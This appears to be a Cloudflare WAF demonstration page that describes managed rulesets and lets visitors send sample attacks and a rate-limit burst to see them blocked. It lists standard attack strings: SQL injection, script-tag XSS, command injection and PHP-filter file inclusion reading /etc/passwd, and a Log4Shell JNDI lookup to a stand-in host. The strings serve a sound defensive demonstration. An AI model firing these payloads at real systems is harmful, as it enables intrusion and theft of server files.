Cloudflare Demo
All demos

Security · WAF

The Cloudflare WAF, tested live

Send real attack payloads — SQLi, XSS, command injection, LFI, Log4Shell — at this zone's managed rulesets and watch them get blocked at the edge. Then fire a request burst to see rate limiting throttle excess traffic with 429 responses.

WAF primer

How the Cloudflare WAF protects this site

Two slides, then live attack probes and a rate limiting burst against real zone configuration.

Managed rules

Every request is inspected at the edge

This zone executes two managed rulesets on all traffic: the Cloudflare Managed Ruleset and the OWASP Core Ruleset at paranoia level 1. Matching requests are blocked with a 403 before they ever reach the origin.

SQLi, XSS, command injection, LFI, and known CVEs like Log4Shell are all covered out of the box — no rules to write.

Request

Benign or hostile

Cloudflare WAF

Managed + OWASP PL1

Allowed → origin

200 OK

Blocked

403 block page

Deployed zone-wide — evaluate every request, no origin changes required

Live attack probes

Managed rules vs. real attack payloads

Each card sends one request from your browser through the zone's Cloudflare Managed and OWASP Core rulesets. Compare the benign baseline against six attack classes — every payload below is verified to return a 403 block.

Benign request

An ordinary GET with no hostile content — should pass the WAF untouched.

GET /api/waf-probe?q=cloudflare

SQL injection — auth bypass

SQLi

Classic tautology: turns a WHERE clause into always-true to bypass authentication or dump rows.

?id=1' OR 1=1--

Blocked by: Cloudflare Managed + OWASP PL1

SQL injection — UNION extraction

SQLi

Appends a second query with UNION ALL SELECT to exfiltrate schema versions, table names, and data.

?id=-1 UNION ALL SELECT 1,2,3,version()--

Blocked by: Cloudflare Managed + OWASP PL1

Cross-site scripting (XSS)

XSS

Reflects an attacker script back into the page to steal session cookies or impersonate the user.

?q=<script>alert(1)</script>

Blocked by: OWASP PL1

Command injection

OS command injection

Breaks out of the intended command context to run an arbitrary shell command on the server.

?cmd=;cat /etc/passwd

Blocked by: OWASP PL1

Local file inclusion (LFI)

LFI

Abuses PHP stream wrappers to read server files — often a stepping stone to full RCE.

?f=php://filter/convert.base64-encode/resource=/etc/passwd

Blocked by: OWASP PL1

Log4Shell (JNDI lookup)

CVE-2021-44228

The 2021 Log4j zero-day: triggers a remote JNDI lookup that loads attacker-controlled code.

?q=${jndi:ldap://evil.example/a}

Blocked by: Cloudflare Managed

Try your own payload

Any string, sent as the q query parameter. The WAF inspects it exactly like the curated attacks.

Probes are sent from your browser to app.orangemoussa.net and inspected by the zone's managed rulesets at the edge. A 403 means the WAF blocked the request before it reached the origin; 200 means it was allowed through.

Live rate limiting

Throttle a burst at the edge

A rate limiting rule scoped to a single test path counts requests per source IP — 5 per 10 seconds — and blocks excess traffic for 10 seconds. Fire the burst and watch the edge start returning 429.

Live rule on this zone

Threshold
5 req
Period
10 s
Mitigation
10 s block
Counted by
Source IP
http.host eq "app.orangemoussa.net" and http.request.uri.path eq "/api/waf-rl-test"

The rule is scoped to this test path only — the rest of the site is unaffected. After a burst, wait ~10 seconds for the mitigation timeout to expire.

Fire a burst

Sends 12 rapid requests to /api/waf-rl-test — the first 5 pass, the rule blocks the rest.

Results appear here as each request returns.